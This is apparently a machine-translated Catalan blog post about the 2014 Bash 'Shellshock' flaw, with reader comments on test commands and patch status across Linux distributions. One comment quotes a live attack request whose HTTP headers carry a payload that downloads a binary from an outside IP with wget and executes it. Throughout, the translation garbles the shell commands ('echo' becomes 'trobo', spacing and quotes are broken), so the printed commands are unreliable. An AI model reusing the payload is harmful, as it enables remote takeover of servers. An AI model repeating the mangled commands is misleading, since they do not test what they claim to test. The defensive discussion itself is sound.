Bash: nova Vulnerabilitat detectada (i corregida)

Camina corrent com pólvora en alguns blocs, una notícia publicada al bloc de seguretat de Red Hat sobre una vulnerabilitat trobada en Bash causa de l'ús indegut de variables globals. Segons la notícia original:

«... la vulnerabilitat es deu a el fet que es poden crear variables d'entorn amb valors especialment dissenyats abans de cridar a la shell de bash. Aquestes variables poden contenir codi que és executat tan aviat com s'invoca el shell. El nom d'aquestes variables elaborades no importa, només els seus continguts. Com a resultat, aquesta vulnerabilitat s'exposa en molts contextos, Per exemple:

  • ForceCommand s'utilitza en configuracions de sshd per proporcionar capacitats d'execució d'ordres limitades per als usuaris remots. Aquest defecte es pot utilitzar per a evitar això i proporcionar execució d'ordres arbitraris. Algunes implementacions de Git i Subversion utilitzen aquests Shells restringits. L'ús regular d'OpenSSH no es veu afectada ja que els usuaris ja tenen accés a una consola.
  • El servidor Apache usant mod_cgi o mod_cgid es veuen afectats si els scripts CGI estan escrits tant en bash, o fresen subnivells. Tals subnivells s'utilitzen de forma implícita per system / popen en C, per os.system / os.popen en Python, si s'utilitza un intèrpret d'ordres system / exec en PHP (Quan s'executa en mode CGI), i open / system en Perl (que depèn en la cadena de comandaments).
  • Scripts PHP executats amb mod_php no es veuen afectats fins i tot si es reprodueixen subnivells.
  • Clients DHCP invoquen scripts shell per configurar el sistema, amb valors presos d'un servidor potencialment maliciós. Això permetria comandaments arbitraris a ser executats, normalment com a root, en l'equip client DHCP.
  • Diversos dimonis i programes amb privilegis SUID poden executar scripts de shell amb els valors de variables d'entorn establertes / influenciats per l'usuari, el que permetria executar comandaments arbitraris.
  • Qualsevol altra aplicació que s'enganxa a un Shell o s'executa un script de shell com l'ús de bash com a intèrpret. Els scripts de shell que no exporten variables no són vulnerables a aquest problema, fins i tot si ells processen contingut no fiable i l'emmagatzemen en variables (deixats) de shell i subnivells oberts.

... »

¿Com saber si el meu Bash està afectat?

Vist això hi ha una manera molt simple de saber si estem afectats per aquesta vulnerabilitat. De fet, vaig provar en el meu Antergos i no tinc cap problema a l'semblar. El que hem de fer és obrir un terminal i posar:

env x = '() {:;}; trobo vulnerable 'bash -c "echo this is a test"

Si ens surt d'aquesta manera no tenim cap problema:

env x = '() {:;}; trobo vulnerable 'bash -c "echo this is a test" bash: avís: x: ignoring function definition attempt bash: error a l'importar la definició de la funció per a `x' this is a test

Si el resultat és diferent, convindria usar els canals d'actualització de les nostres distribucions preferides per veure si ja van aplicar el pegat. Així que ja saben 😉

Actualitzat: Aquest és el resultat d'un company de treball que fa servir Ubuntu 14:04:

env x = '() {:;}; trobo vulnerable 'bash -c "echo this is a test" vulnerable this is a test

Com veuen, fins al moment és vulnerable.


66 comentaris, deixa el teu

Deixa el teu comentari

La seva adreça de correu electrònic no es publicarà. Els camps obligatoris estan marcats amb *

*

*

  1. Responsable de les dades: Miguel Ángel Gatón
  2. Finalitat de les dades: Controlar l'SPAM, gestió de comentaris.
  3. Legitimació: El teu consentiment
  4. Comunicació de les dades: No es comunicaran les dades a tercers excepte per obligació legal.
  5. Emmagatzematge de les dades: Base de dades allotjada en Occentus Networks (UE)
  6. Drets: En qualsevol moment pots limitar, recuperar i esborrar la teva informació.

  1.   Gerson va dir

    Tinc Kubuntu 14.04 de 64 i també em surt:

    env x = '() {:;}; trobo vulnerable 'bash -c «trobo this is a test»
    vulnerable
    això és un test

    Ja vaig actualitzar, però no corregeix. Que fer?

    1.    ILAV va dir

      Esperar que actualitzin. Ja Eos per exemple actualitzar .. 😀

    2.    Joan va dir

      Que estrany, jo també tinc Kubuntu 14.04

      $ Env x = '() {:;}; trobo vulnerable 'bash -c «trobo this is a test»
      bash: avís: x: ignoring function definition attempt
      bash: error a l'importar la definició de la funció per a `x '
      això és un test

      1.    Joan va dir

        Afegeixo que la versió de l'paquet «bash» que s'ha descarregat avui és:
        4.3-7ubuntu1.1

        http://packages.ubuntu.com/trusty/bash

    3.    eliotime3000 va dir

      En el meu cas, a el donar-li la comanda, només em dóna el següent a la terminal:

      >

      En fi, l'acudit és que vaig actualitzar Debian Wheezy i éso és el que em va botar.

      1.    Yukiteru va dir

        Wheezy encara és vulnerable a la segona part de l'informe d'error, al menys per la tarda (UTC -4: 30) encara seguia el problema: /

  2.   petxec va dir

    Acabo de comprovar que després d'aplicar una actualització aquest matí ni Slackware ni Debian ni Centos són afectats ja que van rebre actualització corresponent ..

    Què fa Ubuntu encara vulnerable a aquestes hores? I que em diguin que és segur: D.

    1.    Joan va dir

      Però has provat actualitzar Ubuntu?
      Amb l'actualització d'avui també ho han arreglat.

      1.    petxec va dir

        OK

    2.    robeta va dir

      Experts en seguretat adverteixen de la vulnerabilitat de 'Bash', podria representar una major amenaça per als usuaris de l'Programari Linux que la decisió de heartbleed, on els aficionats poden explotar una errada en Bash per prendre el control complet d'un sistema.
      Tod Beardsley, gerent d'enginyeria de la signatura de ciberseguretat Rapid7, va advertir que la decisió va ser classificat com 10 per la seva gravetat, el que significa que té el màxim impacte, i qualificat com "greu" per la complexitat de l'explotació, el que significa que és relativament fàcil per als atacs de pirates informàtics. A l'usar aquesta vulnerabilitat, els atacants potencialment poden prendre el control de sistema operatiu, accedir a informació confidencial, fer canvis, etc », va dir Beardsley. «Qualsevol amb sistemes que ocupin Bash han d'aplicar el pegat immediatament», va afegir.
      ABANS AQUESTA VULNERABILITAT QUE PRESENTA L'ANTIQUAT EINA (GNU) on s'allotja Bach, seria més convenient per al Programari Linux que desfaci de GNU i canviïn per l'eina BSD.

      PD: no censurin la meva llibertat d'expressió, ... no insultat a ningú, ... no esborrin el meu missatge com l'anterior missatge que m'han esborrat !.

      1.    Xerix va dir

        Ai per favor, no exageris. Com detesto a aquestes persones que fan servir BSD i menyspreen GNU, Linux o qualsevol cosa provinent d'aquests projectes.

      2.    petxec va dir

        Estic amb tu i tens tota la raó en quant a la gravetat d'aquest forat.

      3.    diazepan va dir

        No va ser censura, va ser redundància (havies fet el mateix comentari en el post d'gnome 3.14)

      4.    Personal va dir

        «... i qualificat com" SOTA "PER LA COMPLEXITAT de l'explotació, el que significa que és relativament FÀCIL per als atacs de pirates informàtics»

        Es nota la incongruència?
        Com pot ser fàcil explotar la vulnerabilitat i tenir a el mateix temps nivell "greu" de risc per ser tan complex d'utilitzar-se?
        És un error que es va solucionar a unes hores de conèixer-se i que a l'igual que heartbleed no té informes d'haver estat explotat (És clar aquest té menys temps de conèixer-se).
        És mes premsa groga que risc real.

      5.    petxec va dir

        Et sembla poc important @Staff? Què em diràs ara?

        GET./.HTTP/1.0
        .User-Agent: .Thanks-Rob
        .Cookie: (). {.:;.} ;. wget.-O./tmp/besh.http://162.253.66.76/nginx; .Chmod.777. / Tmp / Besh; ./ tmp / Besh;
        .Host: (). {.:;.} ;. wget.-O./tmp/besh.http://162.253.66.76/nginx; .Chmod.777. / Tmp / Besh; ./ tmp / Besh;
        .Referer: (). {.:;.} ;. wget.-O./tmp/besh.http://162.253.66.76/nginx; .Chmod.777. / Tmp / Besh; ./ tmp / Besh;
        .Accept:. * / *

        $ File nginx
        nginx: ELF 32 bits LSB executable, Intel 80386, version 1 (SysV), statically linked, for GNU / Linux 2.6.18, Stripped

        $ Md5sum nginx
        5924bcc045bb7039f55c6ce29234e29a nginx

        $ Sha256sum nginx
        73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx

        Saps què és? De poc perillós res ...

      6.    Yukiteru va dir

        La situació és prou greu, però d'allà a dir que s'ha de deixar de fer servir bash per una opció de BSD, ja és com a molt, de totes maneres l'actualització ja està, només toco actualitzar i més res.

        Ara bé el PD, crec que està de més company @robet, no crec que aquí els admins es dediquin a esborrar comentaris així perquè si, perquè, des que participo en aquesta comunitat he tingut aquesta sensació i espero que es mantingui així.

        Salutacions.

      7.    ILAV va dir

        Vas posar exactament el mateix comentari en dos post diferents. Si el que intentes és promoure «la font» de la notícia, ho sento, aquest no és el lloc.

      8.    Mario va dir

        Bash ve des Unix (i el seu clon en GNU). Els sistemes basats en BSD com OSX també estan afectats, i segons Genbeta, encara no ho han parchado. Igual per accedir a Bash cal un compte d'usuari, ja sigui local o per SSH.

      9.    Yukiteru va dir

        @Staff:

        1.- Es classifico com a Nivell 10 (màxim nivell de perillositat) per la quantitat de serveis que poden ser afectats per l'informe d'error. A la nota principal deixen ben clar aquest fet, adduint que l'error pot afectar serveis com apatxe, sshd, programes amb permisos suid (xorg, entre d'altres).

        2.- Es va classificar amb Nivell Baix de Dificultat, a l'hora de poder realitzar la seva implementació, i el millor exemple d'això, és l'script de prova per vulnerabilitat que @elav ha col·locat en el post. Molt difícil d'implementar no és, com es pot veure.

        Jo no veig redundància en la informació (només veig una traducció de Google) i si el problema és prou greu, i com tu mateix dius, ja té pegat i solució, però no per això, deixa de ser un risc, i un bastant real .

      10.    Personal va dir

        @petercheco / @Yukiteru

        No em mal interpretin, crec que és clar que el meu critica és la notícia que enllaça Robet i està enfocada la incongruència i no una redundància.

        De la mateixa manera cal diferenciar entre risc i perill (Aquest últim jo no ho esmenti), comunament els fem servir com a sinònims, però aquí, perill seria la capacitat de dany de l'informe d'error i risc la probabilitat que ocorri.
        En el meu particular cas, em entre des del dia d'ahir. No va ser per llistes de correus ni res així Va ser per una distro d'escriptori! Prengui el telèfon i li enviï un missatge a l'sysadmin amb el link i em va confirmar que ja tenia tot parchado, llavors disculpin però no em treuen la son aquestes notícies.

      11.    robeta va dir

        En altres fòrums esmenten sobre la vulnerabilitat de Bash, «la solució que va treure Debian i Ubuntu», però avui van descobrir que segueix existint una vulnerabilitat, així que la solució va ser incompleta, això esmenten !.

        Veig que molts m'han criticat pel simple fet de prevenir a la gent la gravetat de vulnerabilitat -qualificat amb un nivell 10 de màxima perillositat, i esmentar de possibles solucions a l'Programari Linux davant l'antiquada eina de GNU on s'allotja Bash -que perfectament podria ser remplazado GNU amb l'eina BSD al Programari Linux, ... jo també faig servir Linux i m'agrada Linux !.

        Aclareixo que Bash no ve per defecte instal·lat en BSD, és un paquet mes de compatibilitat de Linux que pot ser instal·lat en BSD ... si !. I la font es posa perquè puguin comprovar la notícia, ja que molts dels usuaris de vegades no creuen el missatge o comentari.

        1.    ILAV va dir

          Robet: Com ja et van dir una i altra vegada, el teu comentari amb la notícia ja ho vas posar en un post, no has de posar-ho en cada post que comentes.

          Sobre bash, ja que hi ha altres intèrprets d'ordres que es poden usar en cas que Bash sigui vulnerable. 😉

      12.    Mario va dir

        Robet, que jo sàpiga no hi ha programari que combini el nucli linux amb l'userland BSD. El mes proper és a l'inrevés, kBSD + GNU, com ho fan Gentoo i Debian. A part no l'hi prodría anomenar «antiquat» a GNU (1983) si és posterior a BSD (1977). Tots dos comparteixen la seva arrel unix (però no el codi), no hi hauria «compatibilitat Linux" si Bash va ser creat quan Linus T encara era nen.

  3.   manuelperezf va dir

    uff, havien de testing a aquestes hores és «vulnerable» vagi ratxa que portem ...

    1.    mrcelhw va dir

      Jo ús Debian Testing i fins en aquesta branca hem rebut l'actualització de bash

  4.   diazepan va dir

    segons Genbeta també hi ha una altra vulnerabilitat
    http://seclists.org/oss-sec/2014/q3/685

    la comanda per consultar és
    env X = '() {(a) => \' sh -c «trobo vulnerable»; bash -c «trobo Fallada 2 sense posar pegats»

    1.    ILAV va dir
      env X = '() {(a) => \' sh -c "echo vulnerable"; bash -c "echo Fallada 2 sense posar pegats" sh: X: línia 1: error sintàctic prop de l'element inesperat `= 'sh: X: línia 1:`' sh: error a l'importar la definició de la funció per a `X 'sh : vulnerable: no es va trobar l'ordre Fallada 2 sense parchea
      
      1.    diazepan va dir

        el mateix jo.

      2.    Giskard va dir

        Igual aquí. Però la decisió original de l'post sí que va ser pedaç a (L) Ubuntu 14.04

      3.    x11tete11x va dir

        en comptes de fer un simple fet intenti fer que executi una instrucció que requereix privilegis, em tir «privilegis insuficients» ... no escala privilegis aquest error ?, si no escala privilegis llavors no és tan perillós com el pinten ..

      4.    Xurxo va dir

        Tens raó !! eren dos vulnerabilitats ...

        Al meu en Linux Mint 17 després de la segona actualització de bash que van posar en els repositoris d'Ubuntu ahir a la nit, a l'execució d'aquesta ordre l'intèrpret d'ordres ofereix aquesta sortida:

        env X = '() {(a) => \' sh -c "echo vulnerable"; bash -c "echo Fallada 2 sense posar pegats"
        >

        La versió de «bassh» que es va posar en repositoris d'Ubuntu per actualitzar les anteriors és:

        4.3-7ubuntu1.2

        En sistemes derivats de Debian es pot comprovar la versió instal·lada amb aquesta ordre:

        dpkg -s bash | grep Version

        De tota manera caldria aclarir, al menys per als usuaris de Debian, Ubuntu i Mint; que no han de preocupar-se massa pels programes que executen scripts amb l'encapçalament #! / bin / sh perquè en aquestes distribucions / bin / sh no crida a «bash», sinó que enllaça a la shell «dash» (dash és :)

        La consola de l'alquimista de Debian (dash) és una consola POSIX derivada
        d'ash.
        .
        Des que executa scripts més rapid que bash, i té menys dependències
        de biblioteques (fent-lo més robust contra falles de programari o
        maquinari), s'usa com a consola per defecte de sistema en sistemes
        Debian.

        Així que, al menys en Ubuntu, «bash» és utiizada com shell per al login d'usuaris (també per a l'usuari root). Però qualsevol usuari pot utilitzar una altra shell per defecte per a les consoles (terminals) d'usuaris i root.

        És fàcil comprovar que shell executa els scripts (#! / Bin / sh) executant aquestes ordres:

        file / bin / sh
        (La sortida és / bin / sh: symbolic link to `dash ') seguim el rastre repetint l'ordre

        file / bin / dash
        (La sortida és / bin / dash: ELF 64 bits LSB shared object, x86-64, version 1 (SysV) així que aquest és l'executable.

        Aquests són els resultats en una distribució Linux Mint 17. En altres distribucions no basades en Ubuntu / Debian poden ser diferents.

        No és difícil canviar la shell per defecte !! fins i tot es pot fer servir una diferent per als usuaris i per a l'usuari root. En realitat només cal instal·lar la shell que es prefereixi i canviar la predeterminada amb la comanda «chsh» o editant el fitxer / etc / passwd (encara que els usuaris que no coneixen les conseqüències d'un error a l'editar el fitxer «passwd», és millor que s'informin molt bé i abans d'editar-que facin còpia de l'original per si cal recuperar).

        Jo em sento més còmode amb «tcsh» (tcsh és :)

        La consola de C de TENEX, una versió millorada de la csh de Berkeley

        «Csh» és la que utilitzaven els Mac OS X fa alguns anys. Una cosa lògica tenint en compte que bona part de el sistema operatiu d'Apple és codi de FreeBSD. Ara pel que he llegit ahir, sembla que també proveeixen «bash» per als terminals dels usuaris.

        CONCLUSIONS:

        - Ja s'han distribuït versions de «bash» pegats «per a les distribucions més usades»
        - La versió de «bash» 4.3-7ubuntu1.2 i posteriors no contenen aquests bugs
        - No és obligatori fer servir «bash» en OS * Linux
        - Poques distribucions * Linux enllacen #! / Bin / sh amb «bash»
        - Hi alernativas: ash, dash, csh, tcsh i algunes més
        - No és complicat canviar la shell per defecte a la qual el sistema crida quan obre un terminal
        - Pocs dispositius petits (routers i altres) fan servir «bash», perquè és molt gran !!

      5.    Xurxo va dir

        Ara mateix acaba d'arribar una altra actualització que instal una altra versió de «bash» 4.3-7ubuntu1.3

        Per a Linux Mint 17 i Ubuntu 14.04.1 LTS

        1.    ILAV va dir

          En ArchLinux va entrar la versió bash-4.3.026-1

    2.    robeta va dir

      @ Xurxo ... .csh de Berkeley?, ... alguna cosa entens del que parlo a dalt, i és millor fer servir «csh» de BSD ... abans que l'antiquada eina GNU on s'allotja Bash. Aquesta eina és la millor per al Programari Linux.

  5.   sense nom va dir
  6.   Gonzalo va dir

    I la solució qual seria?

    1.    ILAV va dir

      Esperar que actualitzin el paquet en el teu distro 😉

  7.   diazepan va dir

    El bug va quedar batejat com Shellshock
    http://www.theregister.co.uk/2014/09/24/bash_shell_vuln/

  8.   Pablo Ivan Corretja va dir

    vulnerable
    això és un test

    Encara no hi ha pegat per Ubuntu Studio 14.04

    1.    Brizno va dir

      Reaparat a Ubuntu Studio 14.04.1
      brizno @ UbuntuStudio: ~ $ env x = '() {:;}; trobo vulnerable 'bash -c «trobo this is a test»
      bash: avís: x: ignoring function definition attempt
      bash: error a l'importar la definició de la funció per a `x '
      això és un test

  9.   roader va dir

    En realitat és una vulnerabilitat menor, si t'afecta és que alguna cosa estaves fent malament d'abans ...

    Perquè un script bash que corre amb privilegis de root mai ha d'exposar-se a un usuari. I si corre sense privilegis, no existeix aquesta bulnerabilidad. En realitat, és una tonteria. Molt alarmisme.

    1.    Xerix va dir

      Penso el mateix.

    2.    Personal va dir

      Exacte, per vendre mes diaris o aconseguir més visites són bons aquests bugs.
      Però sempre se'ls oblida esmentar que per poder vulnerar un equip amb aquesta classe de scripts, primer cal tenir accés a bash i després tenir-lo com a root.

      1.    donaro va dir

        staff si utilitzes un apatxe amb CGI només cal posar en les capçaleres http com galetes o referer la funció que vols executar. Fins i tot s'ha fet servir per propagar worms.

    3.    donaro va dir

      i si algú fica un intèrpret d'ordres a un servidor amb un wget mishell.php, en aquest cas no és greu no?

    4.    eliotime3000 va dir

      D'acord amb tu. Vaig pensar que era un error tremend com el de heartbleed (fins i tot la NSA es va prestar per alimentar la morbositat), però a la fi de a el cap era un error menor.

      Hi ha altres bugs realment seriosos com l'absurd consum de Flash i la baixada de rendiment en el Pepper Flash Player, i el ja solucionat error de WebRTC a Chrome i Firefox.

  10.   Binderman va dir

    Sabeu si té solució per a la gent que tenim Linux Mint 16?

  11.   Oscar va dir

    A Debian testing ja va ser corregit.

  12.   yoyo va dir

    En els meus 5 distros està solucionat, al meu OS X no ho sé.

    Si us plau, no censurin el meu comentari, he dit OS X. No se si es pot dir OS X en aquest lloc.

    1.    Tannhäusser va dir

      @yoyo bo tampoc ho flipes massa que encara estan treballant en alguns detalls de l'pegat ... prova amb això i després m'expliques camina XD

      env x = '() {:;}; trobo vulnerable 'bash -c «trobo sóc més vulnerable que les escombraries de l'iphone juny»

      Això si que ho tenen solucionat a el 100% abans que OS X em jugo el que sigui

    2.    eliotime3000 va dir

      Bé, fins a Ars Technica li donen la rellevància a Bash en OSX.

    3.    ILAV va dir

      @Yoyo proper comentari sobre OS X per SPAM .. lla teva save .. 😛

  13.   Tannhäusser va dir

    @yoyo aquí que arreglar el de les comillas..pero la resta ja tu saps 😉

    1.    eliotime3000 va dir

      Com que s'han tornat condescendents amb OSX (perquè OSX igual fa servir Bash: v).

      En fi, no he de embolicar-me tant amb Debian Jessie.

  14.   elhui2 va dir

    Si el sistema és vulnerable a Cent OS:
    yum clean all && yum update bash

    per veure la versió de bash:
    rpm -qa | grep bash

    Si la versió és anterior a bash-4.1.2-15.el6_5.1 teu sistema pot ser vulnerable!

    Salutacions.

  15.   manuelperezf va dir

    2a vulnerabilitat encara no resolta

    env soyvariable2 = '() {(a) => \' sh -c «trobo soyVulnerable»; bash -c «trobo Fallada 2 sense posar pegats»

  16.   Jesus Perales va dir

    Actualitzant ...

  17.   Swicher va dir

    Al meu en Gentoo em passa el contrari, només sóc vulnerable a la primera fallada però amb el segon m'apareix això:
    [Code] sh: X: línia 1: error sintàctic prop de l'element inesperat `= '
    sh: X: línia 1: ` '
    sh: error a l'importar la definició de la funció per a `X '
    sh: vulnerable: no es va trobar l'ordre
    Fallada 2 sense posar pegats
    [/ codi]
    No se si ja hi haurà una versió estable de Bash amb les fallades corregits, però sigui com sigui quedés pendent per a la propera vegada que faci un emergeix -sync && emergeix -update -deep -with-bdeps = i -newuse @world (així de pas actualitzo tot el sistema).

    1.    Yukiteru va dir

      Jo tinc Gentoo amb la versió 4.2_p50 i fins ara ha passat totes les proves. Prova fent un emergeix -sync i després emergeix -av1 app-intèrprets d'ordres / bash, i després revisa que tinguis la versió 4.2_p50 utilitzant la comanda bash -version.

  18.   Fer va dir

    Han provat això?

    I amb nous paquets, nou test que ens proporcionen de Red Hat

    cd / tmp; rm -f / tmp / tiro; env 'x = () {(a) => \' bash -c «trobo date»; cat / tmp / tiro

    si el nostre sistema no és vulnerable i ha estat correctament pedaç ens ha de donar alguna cosa com això
    Data del 1
    2 cat: / tmp / tiro: No existeix el fitxer o directori

  19.   Yukiteru va dir

    Provin aquesta manera:

    env X = '() {(a) => \' sh -c «trobo vulnerable»; bash -c «trobo Fallada 2 pedaç»

    A mi em surt

    vulnerable
    Fallada 2 pedaç.

    1.    Yukiteru va dir

      Oblidin-està malament formatada la línia.

  20.   Oscar Meza va dir

    Excel·lent !, ja vaig fer l'actualització en el meu Slackware, gràcies!

  21.   Lothbrok va dir

    Bones, em sorgeix una pregunta, jo tinc diversos servidors amb «SUSE Linux Enterprise Server 10» de 64 bits.
    Quan executo les ordres sóc vulnerable, fins i tot sóc més vulnerable que les escombraries el iPhone 6 xD
    Si no m'equivoco per actualitzar / instal lar paquets en SUSE es fa amb la comanda «Zypper».

    En alguns servidors em diu això:

    Bial: ~ # Zypper up
    -bash: Zypper: command not found
    Bial: ~ #

    I en altres això:

    SMB: ~ # Zypper up
    Restoring system sources ...
    Parsing metadata for SUSE Linux Enterprise Server 10 SP2-20100319-161944 ...
    Parsing RPM database ...
    Resum:
    Nothing to do.

    Que faig?
    Ja sé que la vulnerabilitat alguns dieu que és menor d'com el pinten però la tinc i no vull estar exposat a el risc, sigui petit o gran.

    Salutacions.

  22.   Sanders Gutiérrez va dir

    Bona nit, he provat pegant el codi que van disposar en l'article, em surt això
    sanders @ pc-sanders: ~ $ env x = '() {:;}; trobo vulnerable 'bash -c «trobo this is a test»
    això és un test
    sanders @ pc-sanders: ~ $
    volen si us plau explicar-me com parchar distro, faig actualitzacions diàriament i no veig canvis a la sortida de l'indicador.

    Moltes gràcies!